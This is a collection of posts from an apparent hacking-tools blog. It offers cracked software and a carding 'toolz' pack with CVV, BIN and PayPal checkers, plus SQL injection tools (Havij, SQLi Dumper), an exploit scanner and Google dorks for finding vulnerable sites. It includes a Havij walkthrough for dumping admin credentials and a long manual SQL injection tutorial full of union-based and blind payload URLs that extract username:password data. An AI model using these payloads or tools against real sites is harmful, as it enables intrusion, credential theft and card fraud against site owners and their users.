Tuesday, December 13, 2016

Easy Hide IP Cracked - Full Version = Setup+Key





HIDE YOUR IP

With an Easy Hide IP Virtual Private Network (VPN), all it takes is a few dollars a month to hide your
IP address and keep your information secure, no matter where you are. You can also access online
content that's restricted in some areas, simply by choosing a new IP address from a compatible
location.

Looking for device setup?

Our download page has setup instructions for all major devices. If you are having problems following these guides or have a question about your license or payment options take a look the questions below.
If you are still having problems use the contact form at the bottom of the page and we will get back to you as soon as possible.

========================================================================================
Mirror 1: Download

Mirror 2: Download

Monday, November 16, 2015

Private Web Toolz [Free Scripts] - HTML/PHP | Script Codes | CVV Checker | Bin Checker | PayPal Checker [Free Download]

Private - HTML/PHP | Script Codes
___________________________________________________________________________________________________

Download our Private Toolz.RAR, package includes: cvv checker, bin checker, paypal checker "HTML/PHP" Codes.With this package you can copy java html element text brackets into your blog or website and upload the PHP from HTML editor script on your site. These script codes are shared to personal hackers for free.

This is free to the public, these tools are for hackers to use other stuff online.
___________________________________________________________________________________________________

Click - Skip Ad Continue To Download


Download Private Toolz

Mirror 1: Download

Mirror 2: Download

Mirror 3: Download

========================================================================================
 Archive Password: Spammingtoolz.blogspot.com
___________________________________________________________________________________________________

Virus Total: Check Status
___________________________________________________________________________________________________





Thursday, May 15, 2014

SQLi Dumper v8.0 - [Free Download]



SQLi Dumper v8.0

========================================================================================

Offer today a wonderful program, and my personal experience and the latest version of the program
Is a program: SQL Dumper v.8.0
Primitive remembrance of what distinguishes the program from the old version:

1. The speed and strength to bring sites
2. speed in the extraction of data tables
3. Protection of crack
4. extracted flag properly
5. you can get mail list
6. More and discovered it yourself

How To Use?

    First, Download Net Framework 4.0
    Download & Extract SQLi Dumper v8.0.rar
    Open SQLi Dumper v8.0.exe
    Afer, Follow These Images


========================================================================================

SQLi Dumper v8.0 - Download Links

-----------------------------------------------------------------------------------------------------------------------------------------------------
Click - Skip Ad Continue To Download
--------------------------------------------------------------------------------------------------------
Download SQLi Dumper v8.0.RAR

Mirror 1: Download

Mirror 2: Download

Mirror 3: Download

========================================================================================
Archive Password:  Spammingtoolz.blogspot.com
___________________________________________________________________________________________________

Virus Total: Check Status
___________________________________________________________________________________________________

Sunday, March 24, 2013

Havij - Advanced SQL Injection Tool [Free Download]

ITSecTeam

Havij - Advanced SQL Injection Penetration Testing Software

========================================================================================
Havij is a tool used in SQL Injection. It allows for a hacker to scan and exploit sites that rely on SQL.

How to use Havij+++

Havij's GUI Havij has an easy to use GUI, pictured right, which can be used to hack into a site in a matter of seconds. Havij is seen as a Script Kiddie tool, because the user does not have to follow the regular steps on SQL injection. It is still, however, a useful tool that many hackers keep in their arsenal for quick attacks. [edit] How To Use Havij

1. Grab yourself a copy of Havij and set it up. You can google around for it or use the free version offered on the official website. 2. Now that you have a copy of Havij set up we need to find vulnerable sites. There are some tools out there to help you, but with most problems online Google is the solution. Open Google and use one of these Dorks below. inurl:index.php?id= inurl:trainers.php?id= inurl:buy.php?category= inurl:article.php?ID=

3. If your site is vulnerable you should get an error like the one pictured to the right.


This site's vulnerable!

4. Now put the URL of your site into the Target area of Havij and press "Analyze".

5. As long as you don't get any errors you should be able to get some information out of your site. You should be seeing something similar to the picture on the right.


Houston we are go for main hacking launch.

6. Now click the "Tables" button. We're now going to see all of the available tables on our targets database. Press the "Get Tables" button and wait until the process finishes.


Hmm, a table called Admin. That may be interesting.

7. Now we have a lists of tables, one of them called admin. Now we have to see what's inside that table. Select any tables that you're interested in, for this case I'll select **users**. Then press "Get Columns", you'll now get a list of columns under the selected table.

8. Select the columns you just found and press "Get Data".

9. We now have a full list of dangerously exploitable data. In less then five minutes we've gained access to the entire list of users, the passwords for these users, the email accounts associated with them and most importantly the administrator account! Keep in mind most of the time these passwords are encrypted using MD5 or other algorithms, so you're going to have to take the time to crack everything, possibly using rainbow tables.

========================================================================================

                                          
                                                      Havij v1.15 Pro Advanced SQL Injection Tool


Havij v1.16 Pro Advanced SQL Injection Tool

                     
                                                    Havij v1.17 Pro Advanced SQL Injection Tool

========================================================================================

Havij - Advanced SQL Injection Tool
----
Advanced SQL Injection Tool
Copyright © 2009-2011
By r3dm0v3


Contact
-------
WebSite: http://ITSecTeam.com
Forum:   http://Forum.ITSecTeam.com
Email:   Info@ITSecTeam.com


Licence
-------
The free version of Havij is free software. We hope it be useful for you. But the Pro version is not free
for further info visit http://www.ItSecTeam.com
This software is provided "as is" without warranties.
Feel free to share and distribute it anywhere but please keep the files original!

There is a Pro version of Havij that is not free.
To purchase Pro version of Havij please visit http://itsecteam.com


Disclaimer
----------
We are NOT responsible for any damage or illegal actions caused by the use of this program. Use on your own risk!


What's New?
-----------
-Webknight WAF bypass added.
-Bypassing mod_security made better
-Unicode support added
-A new method for tables/columns extraction in mssql
-Continuing previous tables/columns extraction made available
-Custom replacement added to the settings
-Default injection value added to the settings (when using %Inject_Here%)
-Table and column prefix added for blind injections
-Custom table and column list added.
-Custom time out added.
-A new md5 cracker site added
-bugfix: a bug releating to SELECT command
-bugfix: finding string column
-bugfix: getting multi column data in mssql
-bugfix: finding mysql column count
-bugfix: wrong syntax in injection string type in MsAccess
-bugfix: false positive results was removed
-bugfix: data extraction in url-encoded pages
-bugfix: loading saved projects
-bugfix: some errors in data extraction in mssql fixed.
-bugfix: a bug in MsAccess when guessing tables and columns
-bugfix: a bug when using proxy
-bugfix: enabling remote desktop bug in windows server 2008 (thanks to pegasus315)
-bugfix: false positive in finding columns count
-bugfix: when mssql error based method failed
-bugfix: a bug in saving data
-bugfix: Oracle and PostgreSQL detection


Features
--------
1.  Supported Databases with injection methods:
       a. MsSQL 2000/2005/2008 with error
       b. MsSQL 2000/2005/2008 no error union based
       c. MsSQL Blind (Pro version only)
       d. MsSQL time based (Pro version only)
       e. MySQL union based
       f. MySQL Blind
       g. MySQL error based
       h. MySQL time based
       i. Oracle union based
       j. Oracle error based
       k. PostgreSQL union based (Pro version only)
       l. MsAccess union based
       m. MsAccess Blind (Pro version only)
       n. Sybase (ASE)
       o. Sybase (ASE) Blind (Pro version only)
2.  HTTPS Support (Pro version only)
3.  Proxy support
4.  Automatic database detection
5.  Automatic type detection (string or integer)
6.  Automatic keyword detection (finding difference between the positive and negative response)
7.  Trying different injection syntaxes
8.  Options for replacing space by /**/,+,... against IDS or filters
9.  Avoid using strings (magic_quotes similar filters bypass)
10. Manual injection syntax support
11. Manual queries with result (Pro version only)
12. Bypassing illegal union
13. Full customizable http headers (like referer,user agent and ...)
14. Load cookie from site for authentication
15. Http Basic and Digest authentication
16. Injecting url rewrite pages (Pro version only)
17. bypassing mod_security web application firewall and similar firewalls (Pro version only)
18. bypassing WebKnight web application firewall and similar firewalls (Pro version only)
19. Real time result
20. Guessing tables and columns in mysql<5 (also in blind) and MsAccess
21. Fast getting tables and columns for mysql
22. continuing previous tables/columns extraction session (Pro version only)
23. Executing SQL commands on Oracle
24. Custom keyword replacement in inejctions (Pro version only)
25. Getting one row in one request (all in one request) (Pro version only)
26. Dumping data into file (Pro version only)
27. Saving data as XML format (Pro version only)
28. View every injection request sent by program (Pro version only)
29. Enabling xp_cmdshell and remote desktop (Pro version only)
30. Multiple tables/column extraction methods (Pro version only)
31. Multi thread Admin page finder
32. Multi thread Online MD5 cracker
33. Getting DBMS Informations
34. Getting tables, columns and data
35. Command executation (mssql only)
36. Reading system files (mysql only)
37. insert/update/delete data
38. Unicode support
 
How to use
----------
This tool is for exploiting SQL Injection bugs in web application.
For using this tool you should know a little about SQL Injections.
Enter target url and select http method then click Analyze.
Note: Try to url be valid input that returns a normal page not a 404 or error page.
 
Version History
---------------
Version 1.15 2011/06/08
-bugfix: a bug releating to SELECT command
-bugfix: finding string column
-bugfix: getting multi column data in in mssql
-bugfix: finding mysql column count
-a new md5 cracker site added
-bugfix: wrong syntax in injection string type in MsAccess
-bugfix: false positive results was removed
-bugfix: data extraction in url-encoded pages
-bugfix: loading saved projects
-bugfix: some errors in data extraction in mssql fixed.
-bugfix: a bug in MsAccess guessing tables and columns
-bugfix: a bug when using proxy
-bugfix: enabling remote desktop bug in windows server 2008 (thanks to pegasus315)
-bugfix: false positive in finding columns count
-bypass mod_security made better
-custom replacement added to the settings
-webknight WAF bypass added.
-bugfix: when mssql error based method failed
-table and column prefix added for blind injections
-custom table and column list added.
-custom time out added.
-default injection value added to the settings (when using %Inject_Here%)
-Unicode support added
-bugfix: a bug in saving data
-new method for tables/columns extraction in mssql
-continuing previous tables/columns extraction made available
-bugfix: Oracle and PostgreSQL detection

Version 1.14 2011/01/08
-bugs related with dot character in database name fixed
-syntax over writing when defined by user in blind injections fixed.
-mssql database detection from error when using JDBC driver corrected.
-time out bug in md5 cracker fixed.
-default value bug fixed
-string encode bug fixed in PostgreSQL
-Post Data field added
-injecting URL rewrite pages added.
-injecting into any part of http request like Cookie, User-Agent, Referer, etc made available
-a bug in finding string column fixed. (specially for MySQL)
-Finding columns count in mysql when input value is non effective added.
-Sybase (ASE) database added.
-Sybase (ASE) Blind database added.
-Time based method for MsSQL added.
-Time based method for MySQL added.
-window resize bug in custom DPI setting fixed.
-some bugs in finding row count fixed.
-getting database name in mssql error based when injection type is guessed integer but it's string fixed.
-mod_security bypass added.
-Pause button added.
-Basic authentication added
-Digest authentication added.

Version 1.13 2010/10/30
-a bug in finding valid string column in mysql fixed.
-Getting tables and column when database name is not found added (mysql)
-Automatic keyword finder optimized and some bug fixed.
-'Key is not unique' bug fixed
-Getting data starts from row 2 when All in One fails - bug fixed
-Run time error when finding keyword fixed.
-False table finding in access fixed.
-keyword correction method made better
-a bug in getting current data base in mssql fixed.
-a secondary method added when input value doesn't return a normal page (usually 404 not found)
-data extraction bug in html-encoded pages fixed.
-string or integer type detection made better.
-a bug in https injection fixed.
-another method added for finding columns count and string column in PostgreSQL
-Oracle error based database added with ability to execute query.

Version 1.12 2010/08/30
-Check for update added.
-Some bugs in MsAccess injection when syntax has been defined manually fixed.
-Enable XP_Exec added to cmdshell.
-Enable OS_Ex added to cmdshell.
-Enable remote desktop added to cmdshell.
-Result added to manuall queries.
-PostgreSQL database added.
-Confusing MsSQL 2005 with MySQL when finding columns count fixed.
-Broken MD5 cracker sites removed.

Version 1.11 Not Released
-a bug in detecting mssql no error fixed.
-a bug in getting columns in mssql no error fixed.
-finding columns count and string column optimized for better injection and data base detecting.
-Finding columns count and string column made better.
-XSS bug in saved reports fixed.
-a bug in injecting into access database fixed.
-keyword test and correction method added.
-MsSQL Blind added.
-Clear log added.
-a bug in getting data in mssql fixed.
-Apply button added to the settings so it is possible to change the settings anytime.
-new method for getting tables and columns in mssql added.
-"414 Request-URI too long" bug fixed.
-MsAccess Blind added.
-Injecting targets with any port (default http port is 80).

                                                  
___________________________________________________________________________________________________

Havij - Advanced SQL Injection Complete Pack Updated Download Links

Archive Includes: Havij v1.15 Pro, Havij v1.16 Pro, Havij v1.17 Pro, Crack+Patch+Loader, Inludes Missing OCX Files: comdlg32.ocx, MSInet.ocx,  Mswinsck.ocx, + Missing .dll Files & Support Files All Included.

-----------------------------------------------------------------------------------------------------------------------------------------------------
Click - Skip Ad Continue To Download
-----------------------------------------------------------------------------------------------------------------------------------------------------

Download: Havij Toolz.RAR

Mirror 1: Havij Toolz.RAR

Mirror 2: Havij Toolz RAR

Mirror 3: Havij Toolz.RAR

Mirror 4: Havij Toolz.RAR

Mirror 5:  Havij Toolz.RAR

========================================================================================
 Archive Password: Spammingtoolz.blogspot.com
___________________________________________________________________________________________________

Virus Total: Check Status
___________________________________________________________________________________________________






Friday, March 15, 2013

SQL Injection - Full Tutorial [English]

In this tutorial i will describe how SQL Injection works and how to
use it to get some useful information.


First of all: What is SQL injection?

It's one of the most common vulnerability in web applications today.
It allows attacker to execute database query in url and gain access
to some confidential information etc...(in shortly).


1. SQL Injection (classic or error based or whatever you call it) :D

2. Blind SQL Injection (the harder part)


So let's start with some action :D


1). Check for vulnerability

Let's say that we have some site like this

http://server/news.php?id=5

Now to test if is vulnerable we add to the end of url ' (quote),

and that would be http://server/news.php?id=5'

so if we get some error like
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..."
or something similar

that means is vulnerable to sql injection :)

2). Find the number of columns

To find number of columns we use statement ORDER BY (tells database how to order the result)

so how to use it? Well just incrementing the number until we get an error.

http://server/news.php?id=5 order by 1/* <-- no error

http://server/news.php?id=5 order by 2/* <-- no error

http://server/news.php?id=5 order by 3/* <-- no error

http://server/news.php?id=5 order by 4/* <-- error (we get message like this Unknown column '4' in 'order clause' or something like that)

that means that the it has 3 columns, cause we got an error on 4.

3). Check for UNION function

With union we can select more data in one sql statement.

so we have

http://server/news.php?id=5 union all select 1,2,3/* (we already found that number of columns are 3 in section 2). )

if we see some numbers on screen, i.e 1 or 2 or 3 then the UNION works :)

4). Check for MySQL version

http://server/news.php?id=5 union all select 1,2,3/* NOTE: if /* not working or you get some error, then try --
it's a comment and it's important for our query to work properly.

let say that we have number 2 on the screen, now to check for version
we replace the number 2 with @@version or version() and get someting like 4.1.33-log or 5.0.45 or similar.

it should look like this http://server/news.php?id=5 union all select 1,@@version,3/*

if you get an error "union + illegal mix of collations (IMPLICIT + COERCIBLE) ..."

i didn't see any paper covering this problem, so i must write it :)

what we need is convert() function

i.e.

http://server/news.php?id=5 union all select 1,convert(@@version using latin1),3/*

or with hex() and unhex()

i.e.

http://server/news.php?id=5 union all select 1,unhex(hex(@@version)),3/*

and you will get MySQL version :D

5). Getting table and column name

well if the MySQL version is < 5 (i.e 4.1.33, 4.1.12...) <--- later i will describe for MySQL > 5 version.
we must guess table and column name in most cases.

common table names are: user/s, admin/s, member/s ...

common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc...

i.e would be

http://server/news.php?id=5 union all select 1,2,3 from admin/* (we see number 2 on the screen like before, and that's good :D)

we know that table admin exists...

now to check column names.


http://server/news.php?id=5 union all select 1,username,3 from admin/* (if you get an error, then try the other column name)

we get username displayed on screen, example would be admin, or superadmin etc...

now to check if column password exists

http://server/news.php?id=5 union all select 1,password,3 from admin/* (if you get an error, then try the other column name)

we seen password on the screen in hash or plain-text, it depends of how the database is set up :)

i.e md5 hash, mysql hash, sha1...

now we must complete query to look nice :)

for that we can use concat() function (it joins strings)

i.e

http://server/news.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/*

Note that i put 0x3a, its hex value for : (so 0x3a is hex value for colon)

(there is another way for that, char(58), ascii value for : )


http://server/news.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/*

now we get dislayed username:password on screen, i.e admin:admin or admin:somehash

when you have this, you can login like admin or some superuser :D

if can't guess the right table name, you can always try mysql.user (default)

it has user i password columns, so example would be

http://server/news.php?id=5 union all select 1,concat(user,0x3a,password),3 from mysql.user/*

6). MySQL 5

Like i said before i'm gonna explain how to get table and column names
in MySQL > 5.

For this we need information_schema. It holds all tables and columns in database.

to get tables we use table_name and information_schema.tables.

i.e

http://server/news.php?id=5 union all select 1,table_name,3 from information_schema.tables/*

here we replace the our number 2 with table_name to get the first table from information_schema.tables

displayed on the screen. Now we must add LIMIT to the end of query to list out all tables.

i.e

http://server/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/*

note that i put 0,1 (get 1 result starting from the 0th)

now to view the second table, we change limit 0,1 to limit 1,1

i.e

http://server/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 1,1/*

the second table is displayed.

for third table we put limit 2,1

i.e

http://server/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 2,1/*

keep incrementing until you get some useful like db_admin, poll_user, auth, auth_user etc... :D

To get the column names the method is the same.

here we use column_name and information_schema.columns

the method is same as above so example would be


http://server/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 0,1/*

the first column is diplayed.

the second one (we change limit 0,1 to limit 1,1)

ie.


http://server/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 1,1/*

the second column is displayed, so keep incrementing until you get something like

username,user,login, password, pass, passwd etc... :D

if you wanna display column names for specific table use this query. (where clause)

let's say that we found table users.

i.e

http://server/news.php?id=5 union all select 1,column_name,3 from information_schema.columns where table_name='users'/*

now we get displayed column name in table users. Just using LIMIT we can list all columns in table users.

Note that this won't work if the magic quotes is ON.

let's say that we found colums user, pass and email.

now to complete query to put them all together :D

for that we use concat() , i decribe it earlier.

i.e


http://server/news.php?id=5 union all select 1,concat(user,0x3a,pass,0x3a,email) from users/*

what we get here is user:pass:email from table users.

example: admin:hash:whatever@blabla.com


That's all in this part, now we can proceed on harder part :)



2. Blind SQL Injection

Blind injection is a little more complicated the classic injection but it can be done :D

I must mention, there is very good blind sql injection tutorial by xprog, so it's not bad to read it :D

Let's start with advanced stuff.

I will be using our example

http://server/news.php?id=5

when we execute this, we see some page and articles on that page, pictures etc...

then when we want to test it for blind sql injection attack

http://server/news.php?id=5 and 1=1 <--- this is always true

and the page loads normally, that's ok.

now the real test

http://server/news.php?id=5 and 1=2 <--- this is false

so if some text, picture or some content is missing on returned page then that site is vulrnable to blind sql injection.

1) Get the MySQL version

to get the version in blind attack we use substring

i.e

http://server/news.php?id=5 and substring(@@version,1,1)=4

this should return TRUE if the version of MySQL is 4.

replace 4 with 5, and if query return TRUE then the version is 5.

i.e

http://server/news.php?id=5 and substring(@@version,1,1)=5

2) Test if subselect works

when select don't work then we use subselect

i.e

http://server/news.php?id=5 and (select 1)=1

if page loads normally then subselects work.

then we gonna see if we have access to mysql.user

i.e

http://server/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1

if page loads normally we have access to mysql.user and then later we can pull some password usign load_file() function and OUTFILE.

3). Check table and column names

This is part when guessing is the best friend :)

i.e.

http://server/news.php?id=5 and (select 1 from users limit 0,1)=1 (with limit 0,1 our query here returns 1 row of data, cause subselect returns only 1 row, this is very important.)

then if the page loads normally without content missing, the table users exits.
if you get FALSE (some article missing), just change table name until you guess the right one :)

let's say that we have found that table name is users, now what we need is column name.

the same as table name, we start guessing. Like i said before try the common names for columns.

i.e

http://server/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1

if the page loads normally we know that column name is password (if we get false then try common names or just guess)

here we merge 1 with the column password, then substring returns the first character (,1,1)


4). Pull data from database

we found table users i columns username password so we gonna pull characters from that.

http://server/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80

ok this here pulls the first character from first user in table users.

substring here returns first character and 1 character in length. ascii() converts that 1 character into ascii value

and then compare it with simbol greater then > .

so if the ascii char greater then 80, the page loads normally. (TRUE)

we keep trying until we get false.


http://server/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>95

we get TRUE, keep incrementing


http://server/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98

TRUE again, higher

http://server/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99

FALSE!!!

so the first character in username is char(99). Using the ascii converter we know that char(99) is letter 'c'.

then let's check the second character.

http://server/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99

Note that i'm changed ,1,1 to ,2,1 to get the second character. (now it returns the second character, 1 character in lenght)


http://server/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99

TRUE, the page loads normally, higher.

http://server/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>107

FALSE, lower number.

http://server/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>104

TRUE, higher.

http://server/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>105

FALSE!!!

we know that the second character is char(105) and that is 'i'. We have 'ci' so far

so keep increment until you get the end. (when >0 returns false we know that we have reach the end).

There are some tools for Blind SQL Injection, I think sql map is the best, but i'm doing everything manually,

cause that makes you better SQL INJECTOR :D



Hope you learned something from this paper.


Have FUN! (:


To be continued and updated...

Monday, February 18, 2013

Gre3NoX Exploit Scanner - [Free Download]



Exploit Scanner - Gre3NoX


Hello and welcome everyone, Today I am going to share a " Exploit Scanner - Gre3NoX " . It is a simple software tool which helps to find vulnerable websites. The usage is simple and easy, It also scan for the websites if they are vulnerable or not.
 

How it works...? Which type of dorks it finds?

Well, it simple and easy , You put the desired " Google Dork " and select the page no. that how much websites you want and if you want to attack specific country then you can put Custom " Domain " as well.

It scans the following Vulnerabilities...

1) SQL Injection.
2) Cross Site Scripting. ( XSS )
3) LFI.
4) LFI Fuzz.
5) RFI.

========================================================================================
 Click - Skip Ad Continue To Download
-----------------------------------------------------------------------------------------------------------------------------------------------------
Download Gre3NoX Exploit Scanner

Mirror 1: Download

Mirror 2: Download

Mirror 3: Download

========================================================================================

Archive Password:  Spammingtoolz.blogspot.com
___________________________________________________________________________________________________

Virus Total: Check Status
___________________________________________________________________________________________________ 

Saturday, November 17, 2012

Google Dorks Private - Vulnerable Google Dorks



Latest Google Dorks.
We call them 'googledorks': Inept or foolish people as revealed by Google. Whatever you call these fools, you've found the center of the Google Hacking.
I need to see if a site I am testing is vulnerable to any of the multiple Google dorks that are available at sites like this and this.

=================================================================================
=================================================================================

Download Private Dorks.RAR


Mirror: Download

Mirror 1: Download Now